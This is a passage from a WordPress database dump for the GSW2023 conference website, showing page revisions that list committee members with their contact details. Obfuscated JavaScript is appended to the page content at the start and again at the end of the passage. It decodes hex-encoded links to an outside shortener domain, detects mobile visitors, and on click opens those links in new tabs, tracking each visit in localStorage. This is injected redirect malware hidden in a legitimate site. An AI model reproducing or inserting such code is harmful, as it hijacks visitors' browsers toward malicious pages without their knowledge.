)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-29 10:09:27','2023-06-29 10:09:27','',4849,'https://gsw2023.com/?p=4962',0,'revision','',0),
(4963,4,'2023-06-29 16:21:40','2023-06-29 16:21:40','','ayman_elzagh','','inherit','open','closed','','ayman_elzagh','','','2023-06-29 16:21:40','2023-06-29 16:21:40','',4849,'https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg',0,'attachment','image/jpeg',0),
(4964,4,'2023-06-29 16:22:25','2023-06-29 16:22:25','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688055733915{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 